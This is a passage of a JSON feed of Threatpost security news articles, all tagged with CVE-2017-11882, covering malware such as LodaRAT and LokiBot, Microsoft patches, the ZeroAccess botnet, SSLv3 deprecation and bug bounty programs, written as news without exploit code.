BASS is used in Win32, macOS, Linux and PocketPC software to provide streaming and recording functions for music.\n\n\u201cThis new command is an improvement on the previous \u2018Sound\u2019 command which used Windows\u2019 built in Sound Recorder,\u201d said researchers. \u201cThe reason for abandoning the previous method is likely because Windows Sound Recorder can only record audio for a maximum of 60 seconds. The new method allows for any length of recording time specified by the threat actor.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "cvss3": {}, "published": "2021-02-09T15:47:03", "type": "threatpost", "title": "Android Devices Hunted by LodaRAT Windows Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2021-02-09T15:47:03", "id": "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "href": "https://threatpost.com/android-devices-lodarat-windows/163769/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:58:42", "description": "As expected, Microsoft delivered a patch today for a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) that was disclosed by HP\u2019s Zero Day Initiative three weeks ago, six months after it was reported to the ZDI.\n\nThe IE8 patch, [MS14-035](<https://technet.microsoft.com/library/security/ms14-035>), is included in a cumulative Internet Explorer rollup that patches 59 flaws in the browser. Most of them are remote-code execution bugs rolling all the way back to IE 6 running on Windows Server 2003 SP2.\n\nThe zero day affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. Microsoft said in May that it was aware of the issue.\n\n\u201cAlthough no attacks have been detected in the wild, the ZDI advisory has given attackers a head start understanding this vulnerability, possibly reducing the time required for researchers to reverse engineer the fix and devise exploit code,\u201d said Craig Young, a security researcher with Tripwire.\n\nSeven bulletins were released today, one other rated critical, and five rated important.\n\nSeven bulletins were released today, one other rated critical, and five rated important.\n\nExperts are urging IT administrators to take a close look at a bulletin for Microsoft Word, [MS14-034](<https://technet.microsoft.com/library/security/ms14-034>), which while rated important by Microsoft, should be the next highest patching priority behind IE.\n\nAffecting Microsoft Word 2007, users could be exposed to remote code execution exploits if a malicious Word document is opened on a vulnerable computer.\n\n\u201cMicrosoft rates it only \u2018important\u2019 because user interaction is required\u2014one has to open a Word file\u2014but it allows the attacker Remote Code Execution. In addition, attackers have become quite skilled at tricking users into opening files,\u201d said Qualys CTO Wolfgang Kandek. \u201cWho wouldn\u2019t open a document that brings new information about the company\u2019s retirement plan? The Word vulnerability is in the newer DOCX file format and only applies to the 2007 release. If you are using the newer versions of Office/Word 2010 or 2013 you are not affected.\u201d\n\nThe second critical bulletin, [MS14-036](<https://technet.microsoft.com/library/security/ms14-036>), patches remote code execution bugs in Microsoft graphics in Office and Lync that could be exploited by users visiting malicious webpages or opening a malicious Office file.\n\n\u201cGraphics parsing requires complex logic and has frequently been associated with attack vectors,\u201d said Kandek. \u201cIt affects Windows, Office and the Lync IM client because they all bring their own copy.\u201d\n\nThis month bring 2014\u2019s total number of bulletins issued by Microsoft to 36, well below last year\u2019s pace of 46 through June.\n\n\u201cWe have become accustomed to see around 100 security bulletins for Microsoft products a year, but it looks as if we are in for fewer this year. This runs counter to the general tendency of the year which has already seen its shares of big breaches, 0-days and the big Heartbleed vulnerability in OpenSSL,\u201d Kandek said. \u201cMaybe the reduced count is based on the increased presence of vulnerability brokers that buy up vulnerabilities for internal use? We will see how the second part of the year develops.\u201d\n\nThe remaining bulletins are rated important and include a pair of information disclosure bugs, one denial of service flaw and a tampering vulnerability.\n\n * [MS14-033](<https://technet.microsoft.com/library/security/ms14-033>) addresses an information disclosure vulnerability in Microsoft XML Core Serivces; an exploit on a website designed to invoke XML Core Services through IE could leak data to an attacker.\n * [MS14-032](<https://technet.microsoft.com/library/security/ms14-032>) also patches an information disclosure bug in Microsoft Lync Server. A user tricked into joining a Lync meeting by clicking on a malicious meeting URL could be exploited.\n * [MS14-031](<https://technet.microsoft.com/library/security/ms14-031>) fixes a denial-of-service bug in TCP. An attacker sending a malicious sequence of packets to the target system could cause it to crash.\n * [MS14-030](<https://technet.microsoft.com/library/security/ms14-030>) patches a vulnerability in Remote Desktop that could allow tampering, Microsoft said. If an attacker has man in the middle access to the same network segment as the targeted system during an RDP session and sends malicious RDP packets, they could exploit the vulnerability.\n\n**Adobe Patches Flash Player**\n\nAdobe released a new version of Flash Player that addresses a [critical vulnerability](<http://helpx.adobe.com/security/products/flash-player/apsb14-16.html>) in the software.\n\nFlash 13.0.0.214 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.359 and earlier versions for Linux are affected.\n\nAdobe said there are no active exploits against these vulnerabilities.\n", "cvss3": {}, "published": "2014-06-10T14:09:16", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday security updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-13T15:41:16", "id": "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "href": "https://threatpost.com/microsoft-patches-ie8-zero-day-critical-word-bug/106572/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "[](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>)\n\nLess than a week after the [publication of exploit code](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>) for a gaping hole in the FTP Service in Microsoft Internet Information Services (IIS), attackers are launching what is described as \u201climited attacks\u201d against Windows users.\n\nMicrosoft has updated its security advisory to warn of the new attacks and added new mitigation workarounds for business running (IIS) 5.0, 5.1, and 6.0.\n\nIn addition to the in-the-wild attacks, Microsoft warned that a new proof of concept has been published to demonstrate a denial-of-service attack on Windows XP and Windows Server 2003 with read access to the File Transfer Protocol (FTP) service.\n\n\u201cThis does not require Write access,\u201d the company warned. \n\nAlso, a new proof of concept allowing DoS was separately disclosed that affects the version of FTP 6 which shipped with Windows Vista and Windows Server 2008. \n\n * Customers should be aware that the Download Center has FTP 7.5 available for Windows Vista and Windows Server 2008. FTP 7.5 is not vulnerable to any of these exploits.\n\nEarlier this week, [Microsoft issued an advisory](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>) to confirm the severity of this vulnerability, which allows remote code execution on affected systems running the FTP service and connected to the Internet.\n", "cvss3": {}, "published": "2009-09-08T11:58:04", "type": "threatpost", "title": "Attackers Pounce on Microsoft FTP in IIS Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:48", "id": "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "href": "https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/72235/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Long thought dead, the peer-to-peer (P2P) ZeroAccess botnet has resurfaced, and as of just a few weeks ago, has returned to propagating click-fraud scams.\n\nResearchers with Dell\u2019s SecureWorks [revealed Wednesday](<http://www.secureworks.com/resources/blog/zeroaccess-botnet-resumes-click-fraud-activity-after-six-month-break/>) that they witnessed the botnet restart itself from March 21 to July 2, 2014 and that halfway through this month \u2013 six months after it was last seen \u2013 the botnet has apparently gone back to its old ways and is again doling out click-fraud templates.\n\nClick-fraud, one of the easier techniques cybercriminals use to monetize malware, is essentially the embezzling of ad revenue from clicks that don\u2019t come from legitimate customers.\n\nDespite the botnet\u2019s resurfacing, researchers insist it hasn\u2019t grown or even tried to incorporate new compromises. Instead the botnet, which has split into two smaller botnets that use different UDP ports, is built around hosts from past infections.\n\nAs seen below, researchers found ZeroAccess in two smaller botnets in both 32-bit (blue) and 64-bit (gray) compromised Windows systems.\n\n\n\n\u201cCompromised systems act as nodes in the P2P network, and they periodically receive new templates that include URLs for attack-controlled template servers,\u201d the firm\u2019s Counter Threat Unit (CTU) wrote.\n\nOnce the URLs are visited, like a chain reaction, the bots are redirected to their final destination.\n\nThe unit claims it counted 55,000-plus different IP addresses \u2013 mostly in Japan, India and Russia \u2013 engaging with the botnet from Jan. 17 to Jan. 25. Some may consider 55K small potatoes compared to the botnet\u2019s heyday, when Microsoft cleaned half a million machines of the virus from Feb. to March 2013, but Dell is stressing that for all intents and purposes ZeroAccess should still be considered substantial.\n\nAdding that it may not be able to do what other flashy botnets can, like carry out banking fraud or hold users\u2019 files ransom, ZeroAccess can still wreak havoc on advertisers and machines it infects alike.\n\nIt was thought the [botnet was dead](<http://threatpost.com/microsoft-zeroaccess-botnet-has-been-abandoned/103273>) in December 2013 after Microsoft, along with Europol\u2019s European Cybercrime Centre (EC3), the F.B.I., and the firm A10 [disrupted ZeroAccess\u2019s](<http://threatpost.com/microsoft-and-friends-take-down-zeroaccess-botnet/103122>) two million odd machines. Click-fraud is just one of the botnet\u2019s favorite pastimes. ZeroAccess, a/k/a Sirefef, has also been seen hijacking search results and redirecting victims to malicious, information stealing websites and for a short stint the platform was even spotted [facilitating Bitcoin mining](<http://threatpost.com/zeroaccess-botnet-cashing-click-fraud-and-bitcoin-mining-103012/77168>).\n\n[Microsoft greatly curbed](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/100717>) the botnet\u2019s click-fraud tendencies in May 2013 after it added its signature to its Malicious Software Removal Tool (MSRT) and cleaned all the infected machines it could find of ZeroAccess.\n", "cvss3": {}, "published": "2015-01-29T14:25:48", "type": "threatpost", "title": "ZeroAccess Returns, Resumes Click-Fraud Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:27", "id": "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "href": "https://threatpost.com/zeroaccess-botnet-returns-resumes-click-fraud-activity/110736/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:58", "description": "There\u2019s an odd bit of behavior that some Windows systems will exhibit when certain kinds of installers are launched, automatically elevating the privileges of the installer process to system-level privileges. In theory, the issue shouldn\u2019t be exploitable because at one point in the process the system will generate an MD5 hash of a DLL that\u2019s to be loaded, and unless the attacker can replace that DLL with a malicious one that sports the same hash, an attack is impossible. But those constraints may not hold for all attackers, a researcher says.\n\nThe weirdness in Windows 7 and Windows Server 2008 was identified by Cesar Cerrudo of IOActive, and he spent some time looking into exactly what causes it and whether he\u2019d be able to exploit the condition. The issue arises when an installer for a program that is already installed on a given machine is executed. When one of those installers is run, it will automatically elevate the privileges of the current installer process to the System level. That would theoretically give an attacker a local elevation of privilege bug, granting him system privileges.\n\n\u201cHowever, an interesting issue arises during the installation process when running this kind of installer: a temporary file is created in `C:UsersusernameAppDataLocalTemp`, which is the temporary folder for the current user. The created file is named `Hx????.tmp `(where `????` seem to be random hex numbers), and it seems to be a COM DLL from Microsoft Help Data Services Module, in which its original name is `HXDS.dll`. This DLL is later loaded by `msiexec.exe` process running under the System account that is launched by the Windows installer service during the installation process,\u201d [Cerrudo wrote in a blog post](<http://blog.ioactive.com/2012/01/free-windows-vulnerability-for-nsa.html?m=1>) explaining the issue.\n\n\u201cWhen the DLL file is loaded, the code in the DLL file runs as the System user with full privileges. At first sight this seems to be an elevation of privileges vulnerability since the folder where the DLL file is created is controlled by the current user, and the DLL is then loaded and run under the System account, meaning any user could run code as the System user by replacing the DLL file with a specially-crafted one before the DLL is loaded and executed.\u201d\n\nBut there\u2019s more to it than just that. In order to exploit the weakness, Cerrudo said that an attacker likely would need to create a malicious DLL with the same MD5 hash as the benign one and then replace the original one with the DLL containing the exploit code. The attack in this case would be against the MD5 algorithm itself, because the attacker would need to create a second message with the same hash as the known message. Known as a second preimage attack, it is practically out of reach for most individual attackers.\n\nHowever, Cerrudo says that it may well be possible for an organization such as an intelligence agency that has massive amounts of compute power and resources to be able to execute such an attack. MD5 is known to have a variety of weaknesses, including collision problems, and Microsoft itself stopped including it in its products seven years ago. Cerrudo said that while exploiting the issue he found via a second preimage attack is likely impractical for most attackers, there may be other vectors out there that could accomplish the same task.\n\n\u201cI think that there could be others. I dedicated some time to it, I did research and tried different ways to exploit the issue but this doesn\u2019t mean that I exhausted all possibilities. It\u2019s just a matter of dedicating some time and trying different options like combining this issue with others, abusing some Windows Installer functionality, timing and blocking issues, etc. These are the kind of things I would try if I would have time. I wouldn\u2019t discard that someone can come up with an idea to exploit it,\u201d Cerrudo said via email.\n", "cvss3": {}, "published": "2012-01-18T15:20:13", "type": "threatpost", "title": "Elevating Privileges Via Windows Installers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:58", "id": "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "href": "https://threatpost.com/elevating-privileges-windows-installers-011812/76111/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:56", "description": "Microsoft is planning to disable support for the weak SSLv3 protocol in Internet Explorer at some undetermined point in the future, and also will remove support for it in the company\u2019s online services soon.\n\nThe security and utility of SSLv3 has been an issue for a long time, but it came into sharper focus earlier this month when researchers at Google released details of a [new attack known as POODLE](<http://threatpost.com/new-poodle-ssl-3-0-attack-exploits-protocol-fallback-issue/108844>) that enables an attacker to decrypt protected content under certain circumstances. If an attacker has control of a target\u2019s Internet connection and can force the victim to run some Javascript in her browser, then he can eventually decrypt the content of a session protected by SSLv3. To do so, the attacker needs to be able to force a connection using the outdated protocol, and that can be done by forcing a failed secure connection between a server and client, which will trigger the server to try and renegotiate the secure connection using a different protocol.\n\nSSLv3 is nearly 15 years old and experts have considered it to be a security risk for a long time and have recommended that site operators use newer alternatives such as TLS 1.2. But there are plenty of sites that still support SSLv3 and IE 6, an artifact of a browser, doesn\u2019t support any transport layer security protocols newer than SSLv3 by default. Microsoft officials said the company is planning to remove the ability for IE to fall back to SSLv3 and eventually will disable the protocol by default altogether.\n\n\u201cWe are committed to helping protect our customers and providing the best possible encryption to protect their data. To do this, we\u2019re working to disable fallback to SSL 3.0 in IE, and disable SSL 3.0 by default in IE, and across Microsoft online services, over the coming months,\u201d Tracey Pretorius of the MSRC said in a blog [post](<http://blogs.technet.com/b/msrc/archive/2014/10/29/security-advisory-3009008-released.aspx>).\n\n\u201cMillions of people and thousands of organizations around the world rely on our products and services every day, and while the number of systems that rely on SSL 3.0 exclusively is very small, we recognize that, particularly for enterprises, disabling the protocol may cause some impact. That\u2019s why we\u2019re taking a planned approach to this issue and providing customers with advance notice.\u201d\n\nMicrosoft also is providing a FixIt tool that allows users to disable SSLv3 support in any supported version of IE.\n", "cvss3": {}, "published": "2014-10-29T14:56:06", "type": "threatpost", "title": "Microsoft Plans to Disable SSLv3 in IE, All Online Services", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-05T15:10:14", "id": "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "href": "https://threatpost.com/microsoft-plans-to-disable-sslv3-in-ie-all-online-services/109087/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "When one Pennsylvanian man couldn\u2019t foot his bills, he opted to steal the identity of someone that could \u2013 one of the world\u2019s richest men, Microsoft co-founder and billionaire Paul Allen.\n\nAn AWOL solider from Pittsburgh swiped Allen\u2019s Citibank credit card account information earlier this year to make a $658.81 payment on a loan from the Armed Forces Bank, according to an [Associated Press report](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n\nA criminal complaint unsealed Monday claims that after acquiring Allen\u2019s account information, the soldier, Brandon Lee Prince, 28, changed the address of the card to his own and reported it missing in an attempt to have a new card sent to his Pittsburgh address. The card was delivered and soon after, the fraudulent charges began to pile up.\n\nOn top of the loan payment, it was also used at a Pittsburgh GameStop ($278.18), a Family Dollar ($1) and at a Western Union, where Price tried to process a $15,000 transaction.\n\nThe bank noticed the illicit charges and promptly notified the FBI who had an agent follow Price around the neighborhood. After seeing him wearing the same clothes he wore in surveillance footage taken at the GameStop and Family Dollar stores, Price was arrested on March 2.\n\nAccording to authorities, Price had actually been away from the army since June 2010 and wanted as a deserter.\n\nAllen, who helped found Microsoft with Bill Gates in 1975, also owns the NBA\u2019s Portland Trailblazers and the NFL\u2019s Seattle Seahawks and has a net worth of about $14.2 billion, [according to Forbes](<http://www.forbes.com/profile/paul-allen/>) \u2013 enough to rank at number 48 on the [publication\u2019s list](<http://www.forbes.com/billionaires/#p_1_s_a0_All%20industries_All%20countries_All%20states_>) of the richest people on the planet.\n\nFor more on this, check out the AP report via the [Washington Post](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n", "cvss3": {}, "published": "2012-03-29T15:56:05", "type": "threatpost", "title": "Fortune Favors the Bold? Man Steals Microsoft Founder's Identity, Credit Card", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:32", "id": "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "href": "https://threatpost.com/fortune-favors-bold-man-steals-microsoft-founder-s-identity-credit-card-032912/76380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-09T22:13:17", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that the LokiBot info-stealing trojan is seeing a surge across the enterprise landscape.\n\nThe uptick started in July, according to the agency, and activity has remained \u201cpersistent\u201d ever since.\n\nLokiBot targets Windows and [Android endpoints](<https://threatpost.com/lokibot-redux-common-android-apps/157458/>), and spreads mainly through email (but also via malicious websites, texts and messaging). It typically goes after credentials (usernames, passwords, cryptocurrency wallets and more), as well as personal information. The malware steals the data through the use of a keylogger to monitor browser and desktop activity, CISA explained.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cLokiBot has stolen credentials from multiple applications and data sources, including Windows operating system credentials, email clients, File Transfer Protocol and Secure File Transfer Protocol clients,\u201d according to the alert, [issued Tuesday](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>). \u201cLokiBot has [also] demonstrated the ability to steal credentials from\u2026Safari and Chromium and Mozilla Firefox-based web browsers.\u201d\n\nTo boot, LokiBot can also act as a backdoor into infected systems to pave the way for additional payloads.\n\nLike its Viking namesake, LokiBot is a bit of a trickster, and disguises itself in diverse attachment types, sometimes using steganography for maximum obfuscation. For instance, the malware has been disguised as a .ZIP attachment [hidden inside a .PNG file](<https://threatpost.com/lokibot-trojan-spotted-hitching-a-ride-inside-png-files/143491/>) that can slip past some email security gateways, or [hidden as an ISO disk image](<https://threatpost.com/malspam-emails-blanket-lokibot-nanocore-malware-with-iso-files/145991/>) file attachment.\n\nIt also uses a number of application guises. Since LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications,\u201d CISA noted. For instance, in February, it was seen [impersonating a launcher](<https://www.trendmicro.com/en_us/research/20/b/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file.html>) for the popular Fortnite video game.\n\nOther tactics include the use of zipped files along with malicious macros in Microsoft Word and Excel, and leveraging the exploit [CVE-2017-11882](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>) (an issue in Office Equation Editor that allows attackers to automatically run malicious code without requiring user interaction). The latter is done via malicious RTF files, researchers have observed.\n\nTo boot, researchers [have seen the malware being sold](<https://threatpost.com/u-s-manufacturer-most-recent-target-of-lokibot-malspam-campaign/148153/>) as a commodity in underground markets, with versions selling for as little as $300.\n\nWith all of these factors taken together, LokiBot represents \u201can attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases,\u201d according to CISA.\n\nSaryu Nayyar, CEO at Gurucul, noted that the advisory is another indication of how malware authors have turned their malicious activities into a scalable business model.\n\n\u201cThe fact that LokiBot has been around for over four years and has gained in capability over time is a reflection of how much malicious actors have advanced the state of their art, leveraging the same development models we use in the commercial space,\u201d she said, via email.\n\nTo protect themselves, CISA said that companies should keep patches up to date, disable file- and printer-sharing services if not necessary, enforce multi-factor authentication and strong passwords, enable personal firewalls and scanning of downloads, and implement user education on how to exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known.\n", "cvss3": {}, "published": "2020-09-23T15:27:18", "type": "threatpost", "title": "CISA: LokiBot Stealer Storms Into a Resurgence", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-09-23T15:27:18", "id": "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "href": "https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:57:21", "description": "CANCUN \u2013 Bounty programs are mislabeled creatures, too often pigeonholed as a payoff for finding individual vulnerabilities in software.\n\nWrong.\n\n\u201cThe name bug bounty is actually a false categorization of what is truly just an incentive program,\u201d said Katie Moussouris, chief policy officer at HackerOne and architect of Microsoft\u2019s vulnerability coordination program, during her talk today at the Security Analyst Summit. \u201cYou are creating an incentive for whatever you want. It\u2019s not just individual bugs all the time.\u201d\n\nThat means organizations interested in nurturing their own programs should think about not only finding and fixing one-off bugs, but also focus on strategic goals such as eliminating entire classes of vulnerabilities and encouraging contributors to build mitigations. Architected correctly, vulnerability incentive programs can also feed an enterprise software development lifecycle and reduce the number of bugs that leak into production.\n\nAnd don\u2019t live under the illusion that you\u2019ll never have to contract a pen-tester again.\n\n\u201cThere\u2019s a time and place to get specialists under contact to look at things you don\u2019t want to open to the world; that\u2019s where a pen test comes in,\u201d Moussouris said. \u201cYou cannot replace pen-tests whole-heartedly. It\u2019s playing whack-a-bug if you\u2019re not feeding your bug bounty program results into your SDL.\u201d\n\nFor its part, Microsoft was standoffish about dipping into the bug bounty waters. And for good reason. As Moussouris explains it, for so long, researchers who wanted to find Windows or Internet Explorer bugs were only after credit in a Patch Tuesday security bulletin. Often, those were career boosters, she said. Even third-party established programs such as the Zero Day Initiative were contributing bugs to Microsoft gratis.\n\nBut as vulnerability brokers and companies such as VUPEN and ReVuln emerged, the market began to exert its pressures on Microsoft. Moussouris had to turn part politician inside the walls of Redmond and convince the powers that be to provide incentives to researchers to not give into the six-figure seduction of the vulnerability market and renew relationships with white-hats.\n\nThe end result were a number of specialized bounties sponsored by Microsoft, including a $100,000 mitigation bypass bounty, the Blue Hat bonus for defense and a temporary Internet Explorer bounty.\n\nIn each case, there were carrots Microsoft was dangling in front of researchers that others in the market were not.\n\n\u201cAgain, this isn\u2019t a bounty, it\u2019s an incentive,\u201d Moussouris said.\n\nYet it still wasn\u2019t good enough, Moussouris said, remembering how she had to convince Microsoft to begin paying for bug submissions in IE 10 while that version of the browser was in beta. She treasures a chart that shows a huge spike in bug submissions once IE 10 was released to manufacturing, many of those critical vulnerabilities that would be fixed in security bulletins.\n\n\u201cThere were no incentives if Microsoft fixed a bug during beta; no bulletin, no credit, no incentives during that period,\u201d Moussouris said. \u201cWhat if we create an incentive beta program if there were no buyers in town?\u201d\n\nThe bounty program was extended into beta, giving only Microsoft first crack at bugs before they were out in the open market. And they were fixed on the cheap too. For the IE 10 in beta, there were 23 submissions, 18 of those would have been rated critical, including four sandbox escapes, Moussouris said. The payout: $28,000, an average payout of $1,100.\n\n\u201cIf you create an incentive at the right time, you will absolutely get the results you want,\u201d Moussouris said.\n", "cvss3": {}, "published": "2015-02-16T13:59:58", "type": "threatpost", "title": "Lessons Learned in Building a Vulnerability Coordination Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-16T20:06:46", "id": "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "href": "https://threatpost.com/dont-build-a-bounty-program-build-an-incentive-program/111103/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:29", "description": "Microsoft last week extended the end-of-life expiration date to July 2018 on its exploit mitigation add-on, the Enhanced Mitigation Experience Toolkit (EMET). But for some time, the once-useful tool has been well on its way out to pasture.\n\nWhile EMET was never meant to be anything more than stopgap protection against exploits, attackers and white-hat researchers accelerated its demise with a number of publicized [bypass attacks](<https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/>). That situation, plus Microsoft\u2019s urgency to have users migrate to Windows 10 and the array of new memory mitigations included in the latest OS has brought the curtain down on EMET.\n\n\u201cIt was a stopgap. It was never supposed to be something [Microsoft] wanted people to use longterm,\u201d said Cody Pierce, director of vulnerability research at Endgame. \u201cThey want people to upgrade Windows 10; for the good of their customers, they want to transition them to Windows 10 where there are some protections baked into the operating system.\u201d\n\nForemost is Control Flow Guard, a technology built to counter memory-corruption vulnerabilities, which has been available since Visual Studio 2015 and is also built into Windows 10 and Windows 8.1. [Control Flow Guard](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) is thought to be a primary impediment to [use-after-free attacks](<https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/>), which became a favorite exploit once ASLR and DEP put a damper in buffer overflow attacks.\n\n\u201cThere are a lot more compile time mitigations [in Windows 10] like Control Flow Guard, and a new Return Flow Guard feature,\u201d said Darren Kemp, security researcher with Duo Security. Kemp also pointed out that since Windows 10\u2019s mitigations are integrated into the operating system, unlike EMET, there are fewer instances where users will notice a performance hit, which was increasingly common with EMET. Also, EMET required close care when configuring it to work, otherwise it could break certain application processes.\n\n\u201cSince it\u2019s not integrated, you don\u2019t get the same type of tight coupling,\u201d Kemp said. \u201cWith a lot of stuff in EMET, you have to test the software you\u2019re applying it to, to make sure the mitigations don\u2019t cause problems. It hooks into functions and injects features. If software does non-standard things, it can cause problems with those apps.\u201d\n\nMicrosoft, meanwhile, has not had EMET on a consistent upgrade path since version 5.0 dropped in 2014. This was an abrupt change from the early days when EMET was introduced and exploits were unleashed within days of Patch Tuesday releases. In announcing the deadline extension to July 31, 2018, Microsoft\u2019s Jeffrey Sutherland acknowledged EMET\u2019s limitations against modern advanced attacks, its performance and reliability shortcomings, and urged users toward Windows 10, which makes the most of hardware virtualization to sandbox applications and links before they can harm the operating system.\n\n\u201cWith the types of threats enterprises face today, we are constantly reminded of this simple truth: modern defense against software vulnerabilities requires a modern platform,\u201d Sutherland said.\n\nThe true value of any mitigation continues to be how well it raises the cost of attacks. Pierce illustrated how advanced attackers have blown well past EMET\u2019s [menu of mitigations](<https://technet.microsoft.com/en-us/security/jj653751>) with advanced logic that automates many facets of an attack that its defenses cannot keep up with.\n\n\u201cIf you\u2019re an exploit kit writer and you acquire a zero day or develop an exploit, you have to get the most bang for your buck; and part of that is supporting a wide range of targets. If you\u2019ve got a Flash exploit, you want it to work on Firefox, Windows, Linux and more and you have to come up with ways to make it easier on you,\u201d Pierce said. \u201cA lot of the ways they\u2019ve figured out to do that bypasses a lot of these late-hook defenses like EMET. They\u2019re getting more value out of it. The types of exploit mitigations EMET provides were limited in utility due to the nature of exploitation. If you look at an exploit kit from 2010, it looks wildly different than it does now.\u201d\n\nDuo\u2019s Kemp, meanwhile, says Windows 10 is one of the hardest targets to breach today.\n\n\u201cThat\u2019s the nature of this stuff: raising the bar. If you\u2019re an attacker, do you want to invest a lot of time and energy to figure out a way around this, or are you going to go after something else?\u201d Kemp said.\n", "cvss3": {}, "published": "2016-11-07T13:50:00", "type": "threatpost", "title": "Microsoft Tears off the Band-Aid with EMET", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-15T14:12:29", "id": "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "href": "https://threatpost.com/microsoft-tears-off-the-band-aid-with-emet/121824/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "Microsoft will use its monthly patch to fix a critical security hole in versions of its Microsoft Office suit that could allow attackers to run malicious code on vulnerable systems. \n\nThe company [announced details of its upcoming monthly patch for November on Thursday](<http://www.microsoft.com/technet/security/bulletin/ms10-nov.mspx>). This months patch also included bulletins regarding upcoming fixes for two other security vulnerabilities: another in the Microsoft Office suite that was rated \u201cimportant,\u201d and a third in the Forefront Unified Access Gateway that was also rated \u201cimportant.\u201d \n\nThe relatively meager group of three bulletins is a welcome change for IT administrators still trying to dig out from[ October\u2019s monthly patch](<https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/>), which comprised 16 bulletins and fixes for 49 separate vulnerabilities. \n\nThe most serious 